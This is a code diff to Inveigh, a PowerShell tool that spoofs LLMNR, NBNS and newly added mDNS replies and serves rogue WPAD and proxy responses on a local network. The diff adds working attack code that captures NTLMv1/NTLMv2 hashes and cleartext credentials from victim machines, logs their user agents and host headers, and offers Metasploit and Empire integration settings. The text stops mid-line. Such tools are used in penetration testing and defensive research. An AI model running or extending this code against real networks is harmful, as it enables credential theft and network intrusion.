challenge/response hashes for only unique IP, domain/hostname, -and username combinations when real time console output is enabled. +.PARAMETER SpooferIPsReply +Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. -.PARAMETER FileOutput -Default = Disabled: (Y/N) Enable/Disable real time file output. +.PARAMETER SpooferLearning +Default = Disabled: (Y/N) Enable/Disable LLMNR/NBNS valid host learning. If enabled, Inveigh will send out +LLMNR/NBNS requests for any received LLMNR/NBNS requests. If a response is received, Inveigh will add the +hostname to a spoofing blacklist. -.PARAMETER FileUnique -Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, -and username combinations when real time file output is enabled. +.PARAMETER SpooferLearningDelay +(Integer) Time in minutes that Inveigh will delay spoofing while valid hosts are being blacklisted through +SpooferLearning. -.PARAMETER StatusOutput -Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. +.PARAMETER SpooferLearningInterval +Default = 30 Minutes: (Integer) Time in minutes that Inveigh wait before sending out an LLMNR/NBNS request for a +hostname that has already been checked if SpooferLearning is enabled. -.PARAMETER OutputStreamOnly -Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if -running Inveigh through a shell that does not return other output streams.Note that you will not see the various -yellow warning messages if enabled. +.PARAMETER SpooferRepeat +Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user +challenge/response has been captured. -.PARAMETER OutputDir -Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must -also be enabled. +.PARAMETER StartupChecks +Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup. + +.PARAMETER StatusOutput +Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. .PARAMETER RunCount Default = Unlimited: (Integer) Number of captures to perform before auto-exiting. @@ -231,20 +233,41 @@ Default = Unlimited: (Integer) Number of captures to perform before auto-exiting .PARAMETER RunTime (Integer) Run time duration in minutes. -.PARAMETER StartupChecks -Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup. - -.PARAMETER ShowHelp -Default = Enabled: (Y/N) Enable/Disable the help messages at startup. - -.PARAMETER Inspect -(Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic. - .PARAMETER Tool -Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's +Default = 0: (0/1/2) Enable/Disable features for better operation through external tools such as Meterpreter's PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire. 0 = None, 1 = Metasploit/Meterpreter, 2 = Empire +.PARAMETER WPADAuth +Default = NTLM: (Anonymous/Basic/NTLM/NTLMNoESS) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to +Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation. + +.PARAMETER WPADAuthIgnore +Default = Disabled: Comma separated list of keywords to use for filtering browser user agents. Matching browsers +will be skipped for NTLM authentication. This can be used to filter out browsers like Firefox that display login +popups for authenticated wpad.dat requests such as Firefox. + +.PARAMETER WPADDirectFile +Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. +Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when +using WPADIP, WPADPort, or WPADResponse. + +.PARAMETER WPADDirectHosts +Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the +defined proxy. + +.PARAMETER WPADIP +Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used +with WPADPort. + +.PARAMETER WPADPort +Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be +used with WPADIP. + +.PARAMETER WPADResponse +wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort +are set. Use PowerShell character escapes where necessary. + .EXAMPLE Import-Module .\Inveigh.psd1;Invoke-Inveigh Import full module and execute with all default settings. @@ -294,57 +317,25 @@ https://github.com/Kevin-Robertson/Inveigh [CmdletBinding()] param ( - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSBruteForce = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferLearning = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADDirectFile = "Y", - [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y", - [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", - [parameter(Mandatory=$false)][ValidateSet("Auto","Y","N")][String]$ElevatedPrivilege = "Auto", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$HTTPAuth = "NTLM", - [parameter(Mandatory=$false)][ValidateSet("Basic","NTLM","NTLMNoESS")][String]$ProxyAuth = "NTLM", - [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$WPADAuth = "NTLM", - [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"), - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP = "", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$NBNSBruteForceTarget = "", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "", - [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "", - [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox", [parameter(Mandatory=$false)][Array]$SpooferHostsReply = "", [parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "", [parameter(Mandatory=$false)][Array]$SpooferIPsReply = "", [parameter(Mandatory=$false)][Array]$SpooferIPsIgnore = "", [parameter(Mandatory=$false)][Array]$WPADDirectHosts = "", + [parameter(Mandatory=$false)][Array]$WPADAuthIgnore = "", + [parameter(Mandatory=$false)][Int]$ConsoleQueueLimit = "-1", [parameter(Mandatory=$false)][Int]$ConsoleStatus = "", [parameter(Mandatory=$false)][Int]$HTTPPort = "80", [parameter(Mandatory=$false)][Int]$HTTPSPort = "443", [parameter(Mandatory=$false)][Int]$LLMNRTTL = "30", + [parameter(Mandatory=$false)][Int]$mDNSTTL = "120", [parameter(Mandatory=$false)][Int]$NBNSTTL = "165", [parameter(Mandatory=$false)][Int]$NBNSBruteForcePause = "", [parameter(Mandatory=$false)][Int]$ProxyPort = "8492", - [parameter(Mandatory=$false)][Int]$WPADPort = "", [parameter(Mandatory=$false)][Int]$RunCount = "", [parameter(Mandatory=$false)][Int]$RunTime = "", + [parameter(Mandatory=$false)][Int]$WPADPort = "", [parameter(Mandatory=$false)][Int]$SpooferLearningDelay = "", [parameter(Mandatory=$false)][Int]$SpooferLearningInterval = "30", [parameter(Mandatory=$false)][String]$HTTPBasicRealm = "IIS", @@ -356,7 +347,45 @@ param [parameter(Mandatory=$false)][String]$HTTPSCertSubject = "localhost", [parameter(Mandatory=$false)][String]$NBNSBruteForceHost = "WPAD", [parameter(Mandatory=$false)][String]$WPADResponse = "", + [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleUnique = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileUnique = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPSForceCertDelete = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LLMNR = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$LogOutput = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$mDNS = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNS = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$NBNSBruteForce = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$Proxy = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMB = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferLearning = "N", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SpooferRepeat = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$WPADDirectFile = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y", + [parameter(Mandatory=$false)][ValidateSet("Y","N","Low","Medium")][String]$ConsoleOutput = "N", + [parameter(Mandatory=$false)][ValidateSet("Auto","Y","N")][String]$ElevatedPrivilege = "Auto", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$HTTPAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("QU","QM")][Array]$mDNSTypes = @("QU"), + [parameter(Mandatory=$false)][ValidateSet("00","03","20","1B","1C","1D","1E")][Array]$NBNSTypes = @("00","20"), + [parameter(Mandatory=$false)][ValidateSet("Basic","NTLM","NTLMNoESS")][String]$ProxyAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", + [parameter(Mandatory=$false)][ValidateSet("Anonymous","Basic","NTLM","NTLMNoESS")][String]$WPADAuth = "NTLM", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$FileOutputDirectory = "", + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "", [parameter(Mandatory=$false)][Switch]$Inspect, + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$IP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$NBNSBruteForceTarget = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SpooferIP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$WPADIP = "", [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter ) @@ -366,6 +395,8 @@ if ($invalid_parameter) throw } +$inveigh_version = "1.3" + if(!$IP) { $IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) @@ -410,26 +441,26 @@ if($NBNSBruteForce -eq 'Y' -and !$NBNSBruteForceTarget) throw } -if(!$OutputDir) +if(!$FileOutputdirectory) { $output_directory = $PWD.Path } else { - $output_directory = $OutputDir + $output_directory = $FileOutputdirectory } if(!$inveigh) { $global:inveigh = [HashTable]::Synchronized(@{}) + $inveigh.cleartext_list = New-Object System.Collections.ArrayList + $inveigh.IP_capture_list = New-Object System.Collections.ArrayList $inveigh.log = New-Object System.Collections.ArrayList $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList - $inveigh.cleartext_list = New-Object System.Collections.ArrayList $inveigh.POST_request_list = New-Object System.Collections.ArrayList - $inveigh.IP_capture_list = New-Object System.Collections.ArrayList $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList $inveigh.valid_host_list = New-Object System.Collections.ArrayList } @@ -450,23 +481,24 @@ if($HTTP_listener.IsListening -and !$inveigh.relay_running) if(!$inveigh.relay_running) { + $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList $inveigh.console_queue = New-Object System.Collections.ArrayList - $inveigh.status_queue = New-Object System.Collections.ArrayList + $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList $inveigh.log_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList - $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList $inveigh.POST_request_file_queue = New-Object System.Collections.ArrayList - $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList - $inveigh.console_output = $false + $inveigh.status_queue = New-Object System.Collections.ArrayList $inveigh.console_input = $true + $inveigh.console_output = $false $inveigh.file_output = $false $inveigh.HTTPS_existing_certificate = $false $inveigh.HTTPS_force_certificate_delete = $false + $inveigh.log_output = $true + $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt" $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt" $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt" - $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt" $inveigh.POST_request_out_file = $output_directory + "\Inveigh-FormInput.txt" } @@ -508,17 +540,16 @@ if($StartupChecks -eq 'Y') $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:"$HTTPIP`:$ProxyPort " } + if($LLMNR -eq 'Y' -and !$elevated_privilege) + { + $LLMNR_port_check = netstat -anp UDP | findstr /C:"0.0.0.0:5355 " + } + } if(!$elevated_privilege) { - if($Inspect) - { - Write-Output "Error:-Inspect requires elevated privileges" - throw - } - if($HTTPS -eq 'Y') { Write-Output "Error:-HTTPS requires elevated privileges" @@ -558,12 +589,22 @@ else if($Inspect) { - $LLMNR = "N" - $NBNS = "N" - $HTTP = "N" - $HTTPS = "N" - $Proxy = "N" - $SMB = "N" + + if($elevated_privilege) + { + $LLMNR = "N" + $NBNS = "N" + $HTTP = "N" + $HTTPS = "N" + $Proxy = "N" + } + else + { + $HTTP = "N" + $HTTPS = "N" + $Proxy = "N" + } + } if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension @@ -580,6 +621,7 @@ elseif($Tool -eq 2) # PowerShell Empire $inveigh.output_stream_only = $true $inveigh.console_input = $false $inveigh.newline = "`n" + $LogOutput = "N" $ShowHelp = "N" switch ($ConsoleOutput) @@ -610,8 +652,22 @@ else } # Write startup messages -$inveigh.status_queue.Add("Inveigh started at $(Get-Date -format 's')") > $null -$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh started")]) > $null +$inveigh.status_queue.Add("Inveigh $inveigh_version started at $(Get-Date -format 's')") > $null + +if($FileOutput -eq 'Y') +{ + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh $inveigh_version started") > $null +} + +if($LogOutput -eq 'Y') +{ + $inveigh.log.Add("$(Get-Date -format 's') - Inveigh started") > $null + $inveigh.log_output = $true +} +else +{ + $inveigh.log_output = $false +} if($ElevatedPrivilege -eq 'Y' -or $elevated_privilege) { @@ -635,14 +691,28 @@ if($firewall_status) } -$inveigh.status_queue.Add("Listening IP Address = $IP") > $null -$inveigh.status_queue.Add("LLMNR/NBNS Spoofer IP Address = $SpooferIP") > $null +$inveigh.status_queue.Add("Primary IP Address = $IP") > $null + +if($LLMNR -eq 'Y' -or $mDNS -eq 'Y' -or $NBNS -eq 'Y') +{ + $inveigh.status_queue.Add("LLMNR/mDNS/NBNS Spoofer IP Address = $SpooferIP") > $null +} if($LLMNR -eq 'Y') { - $inveigh.status_queue.Add("LLMNR Spoofer = Enabled") > $null - $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null - $LLMNR_response_message = "- response sent" + + if($elevated_privilege -or !$LLMNR_port_check) + { + $inveigh.status_queue.Add("LLMNR Spoofer = Enabled") > $null + $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null + $LLMNR_response_message = "- response sent" + } + else + { + $LLMNR = "N" + $inveigh.status_queue.Add("LLMNR Spoofer Disabled Due To In Use Port 5355") > $null + } + } else { @@ -650,9 +720,32 @@ else $LLMNR_response_message = "- LLMNR spoofer is disabled" } +if($mDNS -eq 'Y') +{ + $mDNS_response_message = "- response sent" + $mDNSTypes_output = $mDNSTypes -join "," + + if($mDNSTypes.Count -eq 1) + { + $inveigh.status_queue.Add("mDNS Spoofer For Type $mDNSTypes_output = Enabled") > $null + } + else + { + $inveigh.status_queue.Add("mDNS Spoofer For Types $mDNSTypes_output = Enabled") > $null + } + + $inveigh.status_queue.Add("mDNS TTL = $mDNSTTL Seconds") > $null +} +else +{ + $inveigh.status_queue.Add("mDNS Spoofer = Disabled") > $null + $mDNS_response_message = "- mDNS spoofer is disabled" +} + if($NBNS -eq 'Y') { $NBNSTypes_output = $NBNSTypes -join "," + $NBNS_response_message = "- response sent" if($NBNSTypes.Count -eq 1) { @@ -663,7 +756,6 @@ if($NBNS -eq 'Y') $inveigh.status_queue.Add("NBNS Spoofer For Types $NBNSTypes_output = Enabled") > $null } - $NBNS_response_message = "- response sent" } else { @@ -683,10 +775,6 @@ if($NBNSBruteForce -eq 'Y') } } -else -{ - $inveigh.status_queue.Add("NBNS Brute Force Spoofer = Disabled") > $null -} if($NBNS -eq 'Y' -or $NBNSBruteForce -eq 'Y') { @@ -766,7 +854,6 @@ if($HTTP -eq 'Y') if($HTTP_port_check) { $HTTP = "N" - $inveigh.HTTP = $false $inveigh.status_queue.Add("HTTP Capture Disabled Due To In Use Port $HTTPPort") > $null } else @@ -782,14 +869,12 @@ if($HTTP -eq 'Y') $inveigh.status_queue.Add("HTTP Port = $HTTPPort") > $null } - $inveigh.HTTP = $true $inveigh.status_queue.Add("HTTP Capture = Enabled") > $null } } else { - $inveigh.HTTP = $false $inveigh.status_queue.Add("HTTP Capture = Disabled") > $null } @@ -899,6 +984,17 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y') $inveigh.status_queue.Add("HTTP/HTTPS Authentication = $HTTPAuth") > $null $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null + if($WPADAuth -like "NTLM*") + { + $WPADAuthIgnore = ($WPADAuthIgnore | Where-Object {$_ -and $_.Trim()}) + + if($WPADAuthIgnore.Count -gt 0) + { + $inveigh.status_queue.Add("WPAD NTLM Auth Ignored User Agents = " + ($WPADAuthIgnore -join ",")) > $null + } + + } + if($HTTPDir -and !$HTTPResponse) { $inveigh.status_queue.Add("HTTP/HTTPS Directory = $HTTPDir") > $null @@ -1257,7 +1353,17 @@ $SMB_NTLM_functions_scriptblock = if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$')))) { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)") + } + $inveigh.NTLMv2_list.Add($NTLMv2_hash) if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")) @@ -1266,7 +1372,7 @@ $SMB_NTLM_functions_scriptblock = } else { - $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string) for $NTLM_domain_string\$NTLM_user_string - not unique") + $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))) @@ -1294,7 +1400,17 @@ $SMB_NTLM_functions_scriptblock = if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$')))) { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")]) + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)") + } + $inveigh.NTLMv1_list.Add($NTLMv1_hash) if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")) @@ -1303,7 +1419,7 @@ $SMB_NTLM_functions_scriptblock = } else { - $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string) for $NTLM_domain_string\$NTLM_user_string - not unique") + $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLM_domain_string\$NTLM_user_string - not unique") } if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))) @@ -1335,7 +1451,7 @@ $SMB_NTLM_functions_scriptblock = # HTTP Server ScriptBlock - HTTP/HTTPS/Proxy listener $HTTP_scriptblock = { - param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$NBNSBruteForcePause,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADResponse) + param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$NBNSBruteForcePause,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADAuthIgnore,$WPADResponse) function NTLMChallengeBase64 { @@ -1418,6 +1534,7 @@ $HTTP_scriptblock = $HTTP_running = $true $HTTP_listener = New-Object System.Net.Sockets.TcpListener $HTTP_endpoint + $HTTP_client_close = $true if($proxy_listener) { @@ -1432,22 +1549,35 @@ $HTTP_scriptblock = catch { $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")]) $HTTP_running = $false + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener") + } + } - $HTTP_client_close = $true - :HTTP_listener_loop while($inveigh.running -and $HTTP_running) { $TCP_request = "" $TCP_request_bytes = New-Object System.Byte[] 4096 + $HTTP_send = $true $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("text/html") $HTTP_header_cache_control = "" $HTTP_header_authenticate = "" $HTTP_header_authenticate_data = "" $HTTP_message = "" $HTTP_header_authorization = "" + $HTTP_header_host = "" + $HTTP_header_user_agent = "" + $HTTP_request_raw_URL = "" + $NTLM = "NTLM" while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected) { @@ -1505,12 +1635,67 @@ $HTTP_scriptblock = $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3) $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length) + $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString if($NBNSBruteForcePause) { $inveigh.NBNS_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() $inveigh.hostname_spoof = $true } + + if($TCP_request -like "*-48-6F-73-74-3A-20-*") + { + $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 19) + $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-")) + $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length) + } + + if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*") + { + $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 37) + $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-")) + $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} + $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length) + } + + if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent") + + if($inveigh.file_output) + { + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") + $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP") + } + + if($inveigh.log_output) + { + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP") + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP") + $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP") + } + + if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})) + { + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to 